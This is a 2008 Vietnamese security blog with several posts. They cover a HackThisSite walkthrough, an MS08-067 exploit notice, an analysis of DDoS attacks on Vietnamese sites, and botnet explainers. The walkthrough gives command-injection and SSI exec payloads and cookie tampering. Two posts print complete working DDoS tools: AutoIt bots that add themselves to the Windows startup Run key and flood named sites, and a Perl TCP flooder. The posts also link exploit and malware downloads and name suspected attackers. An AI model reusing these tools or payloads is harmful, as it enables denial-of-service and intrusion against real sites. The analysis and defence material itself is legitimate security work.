Download nhạc từ các trang nhạc lớn của Việt Nam

28 Tháng Mười 2008
@ 10:11
Ý kiến [2]
hackthissite.org (HTS) : web bacsic missions walk through (1-10)
(Được đăng bởi: Phạm Đức Hải)
Hôm nay có chút thời gian ngồi làm mấy cái hack game một cách chi tiết, post lại đây để các bạn yêu thích hack game tham khảo. Kiến thức của 10 bài web bacsic missions này rất đơn giản nhưng để vượt qua hết cũng cần những kiến thức căn bản. Những bài này tôi đã chơi từ rất lâu rồi hồi 2006 thì phải. Nay ngồi tổng hợp lại cho bài bản big grin . Dân dần tôi sẽ có gắng post đầy đủ và chi tiết các nội dung khác nữa của phần hack game (application, javascript,...)

Kiến thức yêu cầu cho 10 bài này :
- Trình duyệt Firefox (hay một cái tương tự) + một số add-on (cookie manager,...)
- View-source
- html
- javascript
- cookie
- SSI (server side include)
- một tẹo UNIX command
---> có vẻ tạm ổn rồi

Cách tiếp cận : đọc giới thiệu của mỗi mission + đọc gợi ý của mission.

Web bacsic mission 1
http://www.hackthissite.org/missions/basic/1/



View-source của trang web này, bạn sẽ nhìn thấy mật khẩu của nó. Đây là bài đơn giản nhất. Theo đúng tư duy của người lập trình mới.







Web bacsic mission 2
http://www.hackthissite.org/missions/basic/2/


Theo nội dung thông báo:
Network Security Sam set up a password protection script. He made it load
the real password from an unencrypted text file and compare it to the
password the user enters. However, he neglected to upload the password
file...
Sam so sánh mật khẩu không mã hóa từ một file text vơi mật khẩu được nhập vào. Tuy nhiên anh ta quên mất upload file...
--> nếu bạn đánh vào mật khẩu để trống (empty password) thì sao ?




Web bacsic mission 3
http://www.hackthissite.org/missions/basic/3/


View source :








Web bacsic mission 4
http://www.hackthissite.org/missions/basic/4/
Desc : An email script has been set up, which sends the password to the administrator. Requirements: HTML knowledge, an email address

View source :



Để ý thấy rằng mật khẩu sẽ được gửi vào mail webmaster@hulla-baloo.com. --> đổi mail này thành mail của bạn.
Save lại file HTML và sửa lại thành:



Sau đó chạy file đó và nhận được kết quả happy





Web bacsic mission 5
http://www.hackthissite.org/missions/basic/5/
Desc : Similar to the previous challenge, but with some extra security measures in place. Requirements: HTML knowledge, JS or FF, an email address.

Yêu cầu biết : HTML, Javascript, Firefox, email

View-source thấy như sau.



Làm tương tự Mission 4, sẽ nhận được thông báo


Điều này có nghĩa là phí server có kiểm tra referer, referer cho biết form ta gửi đến có phải từ chính trang hackthissite.org hay không ?
Vì ta chạy file từ máy tính nên hiển nhiên referer khác với referer server so sánh. Vậy là sao để qua được cái này ?
Một khái niệm là fake referer hoặc một cái khác là HTTP header manipulation sẽ giúp bạn giải quyết vấn đề này.
Kỹ thuật HTTP header manipulation được sử dụng rất rộng rãi trong web hacking.
Trong trường hợp này bạn cần có một công cụ cho phép thay đổi referer hay cao cấp hơn dùng một công cụ HTTP header manipulation. Referer là một phần của HTTP.
Trước khi dùng công cụ trên thì chưa có referer



Công cụ: refcontrol cho trình duyệt firefox (bạn có thể dùng công cụ khác)
http://www.stardrifter.org/refcontrol/



Sau đó chạy lại file html đã save lúc nãy và bấm nút send mail.








Web bacsic mission 6
http://www.hackthissite.org/missions/basic/6/
Desc : An encryption system has been set up, which uses an unknown algorithm to change the text given. Requirements: Persistence, some general cryptography knowledge.

Phần này là một chút tư duy về mã hóa. Bản thân mission đã đưa ra công cụ mã hóa, bạn cần dùng công cụ này để phát hiện ra quy luận. Để phát hiện ra quy luật thì cần các bộ dữ liệu thử do bạn đưa vào.


Mật khẩu đã mã khóa của tôi là c9f69jim. Quy luật như sau:
ký tự mã hóa = ký tự bạn đầu trừ đi số thứ tự của nó trong dãy mật khẩu, tính theo bảng ASCII.
VD :
c9f69jim
01234567
c-0 9-1 f-2 6-3 9-4 j-5 i-6 m-7 = c8d35ecf
Bảng mã:






Web bacsic mission 7
http://www.hackthissite.org/missions/basic/7/

Desc : The password is hidden in an unknown file, and Sam has set up a script to display a calendar. Requirements: Basic UNIX command knowledge.
Yêu cầu : cơ bản về lệnh của UNIX



Ở đây theo gợi ý thì Sam đã để file chứa mật khẩu cùng thư mục với chương trình hiển thị lịch là cal.pl (chính là ô trên).
Do sam lập trình không cẩn thận anh không lọc biến đầu vào hơn nữa việc hiển thị lịch là chạy lệnh cal của hệ điều hành. Do đó có thể lợi dụng điểm này để chạy thêm các lệnh khác. Ở đây dùng lệnh ls (tức là list) --> ô trống ở trên bạn điền vào && ls sẽ nhận được kết quả sau.




Sau đó chạy file http://www.hackthissite.org/missions/basic/7/k1kh31b1n55h.php




Web bacsic mission 8
http://www.hackthissite.org/missions/basic/8/
Desc : The password is yet again hidden in an unknown file. Sam's daughter has begun learning PHP, and has a small script to demonstrate her knowledge. Requirements: Knowledge of SSI (dynamic html executed by the server, rather than the browser)

Con gái của Sam mới học PHP muốn thực hành nội dung mình đã học là đọc file. Vô tình đã cho phép đọc cả file mật khẩu của ông bố.
Nhưng tên file mật khẩu là gì ? Ở đây Sam dùng SSI (server side include) nên có thể dùng lệnh sau để liệt kê các file và thư mục:
<!--#exec cmd="ls .." -->
<!--#exec cmd="ls /var/www/hackthissite.org/html/missions/basic/8/" -->
Khi đó sẽ nhận được file chứa mật khẩu.
Bài này đơn giản nhưng lại là lỗi phổ biến của các lập trình viên, thường thì các bạn thiếu hiểu biết về hệ thống. Giống như con gái của Sam các bạn lập trình cho đọc file, download file từ server mà không kiểm tra cẩn thận biến đầu vào nên có thể bị lợi dụng đọc file từ server, thậm chí những file cực kỳ quan trọng. Ví dụ trên Linux có thể bị đọc file /etc/passpwd, file /etc/shadow (file này là gì các bạn biết ko ? - đó là file mã hóa mật khẩu của hệ điều hành --> nguy hiểm quá nhỉ). Lỗi này tôi đã gặp rất nhiều lần, trong đó có những sản phẩm thương mại.











Web bacsic mission 9
http://www.hackthissite.org/missions/basic/9/
Desc : The password is again hidden in an unknown file. However, the script that was previously used to find it has some limitations. Requirements: Knowledge of SSI, unix directory structure.



Mission này có gợi ý rất cụ thể. Sử dụng lại công cụ của mission 8, chỉ khác là thư mục lưu file chứa mật khẩu là
/var/www/hackthissite.org/html/missions/basic/9/
<!--#exec cmd="ls /var/www/hackthissite.org/html/missions/basic/9/" -->













Web bacsic mission 10
http://www.hackthissite.org/missions/basic/10/
Desc : This time, the password is encoded straight into the script. Whether the user is allowed in or not is determined by cookies; small pieces of information stored by the browser about the webpage that is being visited. Requirements: Javascript knowledge.

Bài này nội dung là cookie --> bạn nên tập trung vào cái này.
Để hiển thị cookie dùng lệnh :
javascript:alert(document.cookie);



Khi đó bạn sẽ nhìn thấy cookie



Chương trình này chứng thực bằng cookie, biến chứng thực là : level10_authorized
hiện tại bằng no --> đổi lại = yes là ok.

làm sao đổi lại ? trên trình duyệt đánh lệnh:
javascript:alert(document.cookie="level10_authorized=yes");





Sau đó đánh bất kỳ ký tự nào vào ok passuword --> ok




Tôi sẽ tiếp tục cập nhật các nội dung khác.

Have fun!
Ý kiến [2] - Chuyên mục: Bảo mật | Hack | war game


27 Tháng Mười 2008
@ 09:13
Ý kiến [0]
MS Server Service Could Allow Remote Code Execution
(Được đăng bởi: Phạm Đức Hải)
Chi tiết lỗi :
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Hiện tại lỗi này đã có mã khai thác, rất nguy hiểm.
Trên Milw0rm cũng đã có PoC.
http://www.milw0rm.com/exploits/6841
http://www.milw0rm.com/exploits/6824
MS08-067 Exploit for CN by EMM

exploit:
http://milw0rm.com/sploits/2008-MS08-067.rar

# milw0rm.com [2008-10-26]
Ảnh demo (PoC):


Mã khai thác sử dụng cổng 445 của SMB để gửi payload.
Cách xử lý :
- Update ngay
- Nếu máy ko có bản quyền ? big grin --> chặn cổng 445 vào, tắt SMB service đi

Goodluck!
Ý kiến [0] - Chuyên mục: Bảo mật | Windows


23 Tháng Mười 2008
@ 12:44
Ý kiến [0]
LlyKil - người đã DDoS bkav.com.vn
(Được đăng bởi: Phạm Đức Hải)
Thông tin về vụ DDoS bkav.com.vn thì chắc ai cũng biết, đã có một bài viết về việc này.
http://vietnamsecurity.googlepages.com/bkav

Vậy là sao mà LliKil bị bắt ?
Theo tôi nghĩ thì việc bắt được LliKil không có gì khó, theo tìm hiểu của tôi LlyKil không giấu các thông tin cá nhân khi thực hiện tấn công. Có thể LlyKil nghĩ đó chỉ là một trò chơi ?
Bắt đầu bằng việc phần tích một vài file code dùng để tấn công (tìm không khó lắm)

#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion
$PROCESS = ProcessList("chem.exe")
If $PROCESS[0][0] > 3 Then Exit
FileCopy(@ScriptFullPath, @SystemDir & "\chem.exe", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "chem", "REG_SZ", @SystemDir & "\chem.exe")
$1 = IniRead(@SystemDir & "\chem.ini", "1", "1", "")
IniWrite(@SystemDir & "\chem.ini", "1", "1", $1 + 1)
If $1 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "chem")
EndIf
TCPStartup()
Dim $TIN[3]
$TIN[0] = "bkav.com.vn"
$TIN[1] = "bkav.com.vn"
$TIN[2] = "bkav.com.vn"
While 1
$NGAUNHIEN = Random(0, 2, 1)
$DATASIZE = StringLen("")
$HOST = $TIN[$NGAUNHIEN]
$PAGE = "/home.aspx"
$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)
$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: top1.vn" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://top1.vn" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)
WEnd


Một đoạn code khác :
#NoTrayIcon
#region
#AutoIt3Wrapper_res_comment=jhg
#AutoIt3Wrapper_res_description=jhgjhg
#AutoIt3Wrapper_res_fileversion=jhgjhg
#AutoIt3Wrapper_res_legalcopyright=jhgjhg
#endregion
$PROCESS = ProcessList("khpt.exe")
If $PROCESS[0][0] > 3 Then Exit
FileCopy(@ScriptFullPath, @SystemDir & "\khpt.exe", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Run", "khpt", "REG_SZ", @SystemDir & "\khpt.exe")
$1 = IniRead(@SystemDir & "\khpt.ini", "1", "1", "")
IniWrite(@SystemDir & "\khpt.ini", "1", "1", $1 + 1)
If $1 = 5 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Run", "khpt")
EndIf
TCPStartup()
Dim $TIN[3]
$TIN[0] = "khpt.vn"
$TIN[1] = "khpt.vn"
$TIN[2] = "khpt.vn"
While 1
$NGAUNHIEN = Random(0, 2, 1)
$DATASIZE = StringLen("")
$HOST = $TIN[$NGAUNHIEN]
$PAGE = "/forum//index.php"
$SOCKET = TCPConnect(TCPNameToIP($HOST), 80)
$COMMAND = "POST " & $PAGE & " HTTP/1.1" & @CRLF
$COMMAND &= "Host: " & $HOST & @CRLF
$COMMAND &= "User-Agent: LlyKil" & @CRLF
$COMMAND &= "Connection: close" & @CRLF
$COMMAND &= "Referer: http://google.com" & @CRLF
$COMMAND &= "Content-Type: application/x-www-form-urlencoded" & @CRLF
$COMMAND &= "Content-Length: " & $DATASIZE & @CRLF
$COMMAND &= "Authorization: Basic QG11dmlldDpAbXV2aWV0" & @CRLF
$COMMAND &= "" & @CRLF
TCPSend($SOCKET, $COMMAND)
WEnd
Đoạn này có thông tin rất cụ thể về LliKil
$COMMAND &= "User-Agent: LlyKil" & @CRL

Hành động của LlyKil thực ra đã bị nhiều hệ thống ghi nhận và phát hiện. Các đoạn mã LlyKil viết bằng AutoIt3.






Trên hình ảnh đã mô tả rõ đặc tính của các chương trình do LlyKil viêt ra : như có kết nối qua IRC kênh #LlyKil,... (điều này sẽ thấy rõ hơn trong video LlyKil tự quay khi DDoS truongton.net).

Một trong các cách phán toán bot là LlyKil viết chương trình crack BKAV Pro và tung lên mạng (crack dc hay ko thì tôi không chắc big grin )




Một trong số các site chứa mã DDoS hiện nay vẫn tồn tại đó là :
http://diemhen.net/llykil/Server.php
http://diemhen.net/llykil/Update.exe




LlyKil từng lưu trữ các dữ liệu và công cụ phục vụ tấn công trên nhiều site trong đó có trang của chính LlyKil http://llykil.net/
Hình ảnh trang chu trang nay do google cache lại được:



Hình ảnh trên một server khác, nơi được dùng để chứa đồ nghề.




Với những dâu vết để lại như vậy cộng thêm log file của máy chủ thì không khó khăn lắm để có thể nhận ra ai là chủ các cuộc tấn công DDoS trong thời gian qua.
LlyKil đã bị bắt là tấm gương cho các bạn đang đi theo con đường này.
DDoS là một hành vi xấu, ngay cả với giới hacker DDoS được coi là "chơi bẩn". Tuy nhiên để thực hiện được các vụ DDoS cũng đòi hỏi có hiểu biết nhất định. Để chống DDoS mà không biết về DDoS thì thật là khó. Tôi hy vọng những bạn có hiểu biết về DDoS không dùng vào mục đích tấn công.

Bonus:
Link download video LlyKil thực hiện DDoS
http://rapidshare.com/files/156695449/BotNet.exe.html

Goodluck!
Ý kiến [0] - Chuyên mục: Bảo mật | Hack


23 Tháng Mười 2008
@ 12:17
Ý kiến [1]
DDoS bằng DDoS FlashX (2)
(Được đăng bởi: Phạm Đức Hải)
Phần 1 : DDoS bằng DDoS FlashX
Tiếp theo phần hôm qua tôi đã cập nhật, hôm nay tôi có bổ xung thêm các thông tin cụ thể hơn: ai đã tiến hành DDoS, code do ai viết,...

Một chố lưu chữ mà kẻ tấn công để là http://worldprisource.com
các bạn hãy để ý hình chỗ cái ảnh quay quay, đó chính là file flash chứa đoạn mã DDoS từ bên http://phoxitin.com/flashx/index.html

Một số site chứa mã để DDoS:
http://a2thanthuong.com/3fviet/post.php
http://a2thanthuong.com/3fviet/
http://a2thanthuong.com/index --> Ảnh của DCH (dinhcaohack)




DCH có nghĩa là dinhcaohack (đỉnh cao hack) --> Một thành viên nhóm Vniss, HVA.
Ảnh sau đây không biết có phải của DCH ko :d ?



Theo thông tin tên miền a2thanthuong.com , khả năng là DCH là chủ sở hữu tên miền này.



Người chủ sở hữu địa chỉ mail  vnsdks@gmail.com là BVQ



Một trong các đoạn code DCH đã viết là DCH Flood Perl version 1.0

DCH Flood Perl version 1.0
--------------------------------------------------------------------------------
Code:
#!/usr/bin/perl
################################################## ####
# Dinhcaohack DdOs 1.0
# Written by Dinhcaohack # Develop (TCP Flooder////Apache Flooder)'s mind
# UK - Manchester 15/05/2006 ... sad night
################################################## ####
use IO::Socket;
print "Ke thu`:\n> ";
$victim = <STDIN>;
chop ($victim);
if ($victim eq "") {
die "Sai roai`!\n";
}
print "Enter Port to flood :\n> ";
$port = <STDIN>;
chop ($port);
if ($port eq "") {
die "Sai roai`!\n";
}
print "Enter times to F*** (more than 1000):\n> ";
$loop = <STDIN>;
chop ($loop);
if ($loop eq "") {
die "Invalid Input!\n";
}

$dch = "Dinhcaohack";
print "[+] Kie^?m tra su. to^`n ta.i cua? victim ...\n";
$string = inet_aton($victim) || die "[+] Host kho^ng to^n` tai. or not connect to the Internet...?\n";
# Kho^ng dung` -w option trong ca^u le^.nh perl
print "[+] Ok. $target to^n` ta.i ...\n";
print "[+] Connecting to $victim voi' $port...\n";
print " +============================+\n";;
print " | DinhcaohaKCoolAttacker v1.0|\n";
print " | Written By DinhcaohaK |\n";
print " | Never use it ... |\n";
print " +============================+\n";;
$n = "99999";
die "Cannot Connect .. try again\n" if !$n;
print "Connecting...\n\n";
for ($i = 0; $i <= $loop; $i++){
$socket = IO::Socket::INET->new(PeerAddr => $victim, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Socket error.\n";
$typeattack .= $dch x $n;
print "Attacking...";
print $socket "$typeattack\n";
print "OK\n\n";
close($socket);
print "Sending request $i\n";
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>"$port",
PeerAddr=>"$victim"
);
sleep 1;
print $sox $request;
sleep 1;
close $sox;
};
print "\n\n";
print " Demo ver. ";
exit;


Hic, share xong roài mà anh em dùng nghịch lung tung là DCH bùn lắm nhá
dinhcaohack(VNISS)

Có lẽ tạm thời thế đã, tôi cũng không có bình luận gì thêm. Các bạn nghĩ thế nào ? DCH nghĩ thế nào ?

Ý kiến [1] - Chuyên mục: Bảo mật | Hack


22 Tháng Mười 2008
@ 03:23
Ý kiến [0]
DDoS bằng DDoS FlashX
(Được đăng bởi: Phạm Đức Hải)
Gần đây nạn DDoS trỏ nên phổ biến, nhiều bạn trẻ còn thấy đây là một trò thú vị. Muốn "chơi" nhau thì sài DDoS sad

Tôi nhận được thông tin này từ một người bạn. Tôi có một vài hình ảnh và phân tích đơn giản để các bạn được rõ.
Đầu tiên kẻ xấu kiểm soát 1 số site có lượng truy cập lớn hay một số lượng lớn các site, càng nhiều càng tốt.
Thậm chí nhiều bạn còn lấy chính site của mình để DDoS trang khác. Sau đó soạn 1 file flash đơn giản, nhiệm vụ của file flash này là gửi yêu cầu liên tục đến site mục tiêu.

Ví dụ, site mục tiêu là site aptech.ac.vn



Site này bị DDoS từ nhiều site khác trong đó có : http://phoxitin.com



View-source thì thấy code như sau:



Các file làm nhiệm vụ DoD đó là get.swf, post.swf, post.php. Nội dung từng file như sau:



File chứa tên mục tiêu nằm trong 2 file ddos.txt và ddos2.txt



Link file các file flash này có thể được để như 1 điểm ảnh trên các site dùng để tấn công. Nó sẽ gửi các yêu cầu liên tục đến site mục tiêu.
Số lượng người truy nhập các site các lớn thì mục tiêu càng nhanh bị hạ gục. File Flash này nhiều khi còn thiết kế để khi thành viên của các site dùng để tấn công gửi yêu cầu đến site mục tiêu, khi đó không thể xác định được đâu là nguồn gốc của tấn công, vì có rất nhiều IP.


Còn rất nhiều thông tin về DDoS tôi sẽ cập nhật khi có thời gian happy
Ý kiến [0] - Chuyên mục: Bảo mật | Hack


16 Tháng Mười 2008
@ 11:09
Ý kiến [0]
Bot & Botnet (phần 4)
(Được đăng bởi: Phạm Đức Hải)

    1. Phòng chống bot và botnet

Phòng thử chống lại việc lây nhiễm và tấn công của bot chia làm 3 nội dung chính:


- Phòng ngừa: người sử dụng, những người quản trị hệ thống nên hiểu cơ chế lây nhiễm và phát tán các bot để có các phòng ngừa. Sử dụng các chương trình phát hiện, tiêu diệt virus, mã độc,…sử dụng hệ thống tường lửa, các hệ thống phát hiện xâm nhập,...

- Phát hiện: có thể phát hiện việc xuất hiện của bot bằng cách giám sát các tiến trình, giám sát băng thông và gói tin trong mạng. Xem các cảnh báo, log file từ các hệ thống cảnh báo, tường lửa,…

- Xử lý: xử lý khi phát hiện có bot, xử lý khi bị botnet tấn công


Đối với người dùng thông thường (Dạng Home user)

Phòng ngừa :

- Tuân thủ các chính sách bảo mật

- Cập nhật các bản vá các phần mềm trên máy

- Tham khảo thông tin cập nhật tại cert.org phần “Home Network Security” http://www.cert.org/tech_tips/home_networks.html đây là những nội dung rất căn bản và hữu ích..

- Bật chế độ tự động cập nhật đối với hệ điều hành và phần mềm ứng dụng [theo CERT, 2001]

- Thao tác an toàn khi truy nhập mail, web, chat,… như không lưu mật khẩu..

- Sử dụng và cập nhật thường xuyên phần mềm diệt virus phổ biến.

- Sử dụng tường lửa và thiết lập các chế độ hợp lý.


Phát hiện :

- Cổng mặc định của IRC là 6667, cổng này có thể bị thay đổi. Dùng lệnh netstat – an trên cả Windows và Linux để kiểm tra các cổng ra vào mà máy tính đang sử dụng.

Ví dụ :

C:/windows> netstat – an

TCP your.mac hine.ip remote.irc.server.ip :6667 ESTABLISHED

Như trên thì có nghĩa là có kết nối IRC đến remote.irc.server.ip qua cổng 6667.

Các server IRC có thể lắng nghe trên các cổng 6000- 7000A169 4E

Đây cũng là cách để phát hiện các phần mềm gián điệp khác.

- Giám sát băng thông, gói tin trên mạng, các cổng kết nối. Có thể có một vài dấu hiệu như mạng chậm, tỉ lệ gói tin gửi đi và nhận được khác thường,…

- Phần mềm chống virus và phần mềm gián điệp có thể phát hiện ra chúng.

- Trong một số trường hợp có thể dùng các chương trình quét trực tuyến của các hang bảo mật lớn. [theo SYMANTEC]


Xử lý:


- Ngắt kết nối mạng của máy bị nhiễm mã độc, để tránh nguy cơ ảnh hưởng đến các máy cùng mạng.

- Cập nhật phần mềm diệt virus, kiểm tra xem nhà cung cấp hệ điều hành, phần mềm có bản vá hay không ?

- Nếu các chương trình diệt virus không phát hiện ra có thể dùng các công cụ hiển thị các tiến trình của máy tính để phát hiện và diệt bằng tay.

- Nếu trên máy có chứa các thông tin nhay cảm như tài khoản ngân hàng thì cần báo ngay cho nơi quản lý thẻ để tạm ngưng sử dụng hoặc nếu là mật khẩu thì cần đổi lại ngay.

- Nếu không xử lý được thì cần nhờ người có kỹ thuật xử lý.


Đối với quản trị hệ thống

Phòng chống:

- Áp dụng các chính sách bảo mật thông dụng.

- Theo hướng dẫn của nhà cung cấp hệ điều hành, phần mềm ứng dụng nâng cấp và cập nhật bản vá.

- Theo dõi thông tin về các lỗ hổng bảo mật trên các trang bảo mật uy tín, nhận thông tin bảo mật từ các mailing list bugtraq.

- Bật chế độ tự động cập nhật đối với hệ điều hành và phần mềm ứng dụng.

- Thao tác an toàn khi truy nhập mail, web, chat,… như không lưu mật khẩu.

- Sử dụng và cập nhật thường xuyên phần mềm diệt virus phổ biến.

- Sử dụng tường lửa và thiết lập các chế độ hợp lý.

- Cài đặt các phần mềm để giám sát hệ thống, phân tích log file hoạt động và truy nhập của hệ thống.

Phát hiện

- Sử dụng các kỹ thật như đối với người dùng thông thường.

- Thường xuyên giám sát log của hệ thống sử dụng, log của hệ thống giám sát, có cơ chế cảnh báo tự động cho người quản trị như gửi mail,…

- Giám sát mạng, dùng tường lửa chặn các cổng không cần thiết. một tiện ích nhỏ cho phép xem các cổng đóng mở ngoài netstat là fport của McAfee:

http://www.foundstone.com/knowledge/proddesc/fport.html

- Phân tích log của phần mềm bắt gói tin có thể phát hiện ra server và kênh bí mật của kẻ tấn công sử dụng, biết được mật khẩu kết nối IRC mã hóa hay không mã hóa.

- Tiến hành quét toàn bộ các máy tình nghi có chứa mã độc, rà soát, tìm và dỡ bỏ backdoor, rootkit.

- Tham khảo them tài liệu của Dave Dittrich, University of Washington

o “Dissecting Distributed Malware Networks “

url: http://security.isu.edu/ppt/pdfppt/Core02.pdf

o Security Incidents: World-wide distributed DoS and "warez" bot networks (fwd)::Security focus mailing list Date: May 03 2002

url: http://lists.insecure.org/lists/incidents/2002/May/0026.html


Xử lý :

- Sử dụng các kỹ thật như đối với người dùng thông thường.

- Cô lập các máy bị nhiễm sang một phân mạng riêng biệt.

- Lưu trữ và giữ an toàn dữ liệu, logs file của Firewalls, Máy chủ Mail , IDS, DHCP, proxy...

- Xử dụng phần mền bắt gói tin để phân tichs cách thức hoạt động của bot, phát hiện các máy bị lây nhiễm, nguồn gốc của nơi phát lệnh,…

- Liên hệ các trung tâm xử lý sự cố máy tính, các trung tâm an ninh mạng để cùng phối hợp giải quyết.


    1. Xu hướng phát triển của Bot và Botnet

Sử dụng mạng IRC để điều khiển zombie vẫn là một xu hướng lớn trong việc phát hiển các công cụ DDoS của kẻ xấu. Trong tài liệu [CERT, DOS_TRENDS] “Trends in Denial oFf8BS5er0v6icEe4 Att6a9ck4ETechnology” George M. Weaver & Kevin J. Houle đến từ CERT® Coordination Center trình bày rất rõ rang việc xây dụng và điều khiển các botnet sử dụng IRC. Tôi chỉ đưa lại một số điểm chính:.


Khả năng tồn tại – Đây là một vấn đề lớn được các kẻ tấn công rât quan tâm vì chi chí và công sức bỏ ra để xây dụng một botnet lớn là rất lớn. Giao thức Internet Relay Chat là một giao thức phổ biến và được sử dụng rộng rãi. Các mạng IRC công cộng lớn cùng với các dịch vụ tên miền động dyndns.com & no -ip.com được tận dụng làm cho các kênh sử dụng vào mục địch xấu khó bị phát hiện và dễ tùy biến đối với kẻ tấn công. Botnet dựa trên IRC khó bị phát hiện, giám sát và tiêu diệt. Do đó DDoS bằng IRC botbet nguy hiểm hơn DoS truyền thống rất nhiều.


Sự lây nhiễm và lan truyền— số lượng botnet ngày tăng, đồng thời với nó số nút (zombie) của botnet cũng tăng lên. Các botnet ngày càng tinh vi hơn. Các công cụ phát tán cũng tinh vi và nguy hiểm hơn. Đặc biệt là các công cu được phát triển cho phép tự động phát hiện lỗ hổng và lây nhiễm mã độc.


Mục đích sử dụng -- mục đích chính vẫn là DDoS, Spam mail, lấy chộm thông tin cá nhân, làm hệ thống chia sẻ file, phần mềm,…


(còn nữa)

Ý kiến [0] - Chuyên mục: Bảo mật


16 Tháng Mười 2008
@ 11:07
Ý kiến [0]
Bot & Botnet (phần 3)
(Được đăng bởi: Phạm Đức Hải)

    1. Quá trình lây nhiễm và điều khiển bot

Phần này sẽ trình bày cách thức kẻ tấn công sử dụng bot, tùy biến bot cho phù hợp với mục đích sử dụng; cách thức kiểm soát máy bạn nhân, quá trình lây nhiễm và điều khiển bot, cách tấn công sử dụng zombie …


Lập trình và thay đổi mã nguồn: quá trình này tùy thuộc vào khảnăng của kẻ tấn công. Bot do kẻ đó viết hay tận dụng lại của người khác và chỉnh sửa cho phù hợp với mục đích sử dụng. Các thông tin tùy chỉnh trên các bot hoặc các bot cập nhật là IRC server, cổng IRC TCP, tên của kênh, mật khẩu hoặc mã chứng thực.

Thêm nữa, tùy thuộc vào mục đích sử dụng, kẻ tấn công có thể thay đổi vị chí, tên file đặt trên máy tính đã bị lây nhiễm. Ở mức cao hơn nữa kẻ tấn công có thể sử dụng các kênh IRC động hay sử dụng nhiều kênh IRC. Để làm như vậy kẻ tấn công có thể sự dụng các dịch vụ tên miền động như dyndns.com hay no-ip.com để ánh xạ tên server của IRC với IP máy chủ của nó..


Hình 4. Quá trình lây nhiễm và điều khiển bot

Hình trên mô tả một bot được lây nhiễm như thế nào? Quá nhân bản qua một lượng lớn các máy khác để tạo nên mạng các bot hay mạng các zombie.


The attacker, attempts to infect the victim machines with bots through either exploiting some operating system/application vulnerability or trick the user into executing a malicious program  leading to bots installation.

Kẻ tấn công sẽ có gắng kiểm soát và lây nhiễm phần mềm nguy hiểm lên máy nạn nhân thông qua các lỗ hổng của ứng dụng, hệ điều hành hay bằng một cách thức nào đó lừa người sử dụng chạy chương trình kich hoạt bot. Ví dụ : một số trang cung cấp các bản bẻ khóa phần mềm, các trang cho download miễn phí,… đi kèm với chúng là virus, phần mềm gián điệp,… Người sử dụng máy tính thiếu hiểu biết sẽ dễ dàng bị mắc lừa và kích hoạt bot.

(1) Cách cơ bản là kẻ tấn công làm lây nhiễm hàng hoạt và tự động một số lượng lớn các máy tính dựa trên mã khai thác lỗ hổng mà các máy này mắc phải. Sau đó kẻ tấn công có thể kiểm soát các máy này, cài phần mềm backdoor (của hậu) lên chúng và có thể dùng chúng là nguồn phát tán và lây nhiễm mã độc. Việc rà quét tự động và khai thác lỗ hổng có thể do phần mềm dạng sâu máy tính (worm) đảm nhiệm. Một cách khác là kẻ tấn công sử dụng các trang web, đặc biệt là các trang web lớn và uy tín mà chúng kiểm soát được, chúng sẽ chèn mã độc vào đó, người dùng thông thường đã có sự tin tưởng đối với những site này và dễ dàng chấp nhận việc download về máy tính khi có của sổ download hiện lên. Bản than chính phần mềm IRC cũng có thể đã bị chèn mã độc và và người dùng cài đặt cùng với IRC mà không hề hay biết.

Sauk khi cài đặt thành công trên máy nạn nhân, bot sẽ copy thành nhiều bản trên máy tính nạn nhân, cập nhật thông tin registry (trên windows).

Ở bước (2) bot sẽ thực hiện kết nối tới IRC server với nickname ngẫu nhiên, sử dụng khóa bí mật để kết nối vào kênh riêng mà kẻ tấn công đã thiết lập trước đó.


Nhiều khi kẻ tấn công có thể sử dụng các server IRC công cộng cho các hoạt động tấn công này, tất nhiên khi bị phát hiện thì người quản trị hệ thống này sẽ loại bỏ kênh đó và kẻ tấn công cũng sẽ mất đi đội quan zombie kết nối vào đó. Do đó để tranh việc này kẻ tấn công thường sử dụng các dịch vụ như dyndns.com, no -ip.com để ánh xạ động các bot đến nhiều server IRC (ở bước (3)).

Ở bước (4), bot đã hoàn tất việc cài đặt và kết nối, sẵn sàng chờ lệnh phát động từ người sở hưu nó (bước (5)).

Bước (6), kẻ tấn công truy nhập kênh kiểm soát duy trì và điều khiển các bot. Thông thường mật khẩu để điều khiển hệ thống bí mật này sẽ được mã hóa và có cơ chế bị botnet khó bị một kẻ khác chiếm đoạt mất quyền điều khiển.

Bước (7), kẻ tấn công điều khiển các zombie trực tiếp hoặc từ xa và phát lệnh tấn công mục tiêu. Tấn công phổ biến là tấn công từ chối dịch vụ (như minh họa trên), gửi thư rác, đánh cắp thông tin cá nhân,… Kẻ tấn công cố gắng tạo ra việc truy nhập mục tiêu từ các zombie càng giống thật càng tốt. Tấn công DDoS kiểu này, yêu cầu gửi đến mục tiêu xuất phát từ tất cả cá zombie với các IP khác nhau khiến việc xác định kẻ tấn công vô cùng khó khăn.


    1. Một số bot cơ bản

Phần này tôi liệt kê một số bot nguy hiểm chạy trên hệ điều hành windows.

Chi tiết có thể tham khảo them tại http://www.simovits.com/trojans/trojans_action.html .

GTbot

Các thông tin them về GTbot có thể tham khảo tại http://swatit.org/bots/gtbot.html :

- sử dụng các chương trình mIRC hợp lệ

- dễ dàng viết lại hay chỉnh sửa các nội dung điều khiển

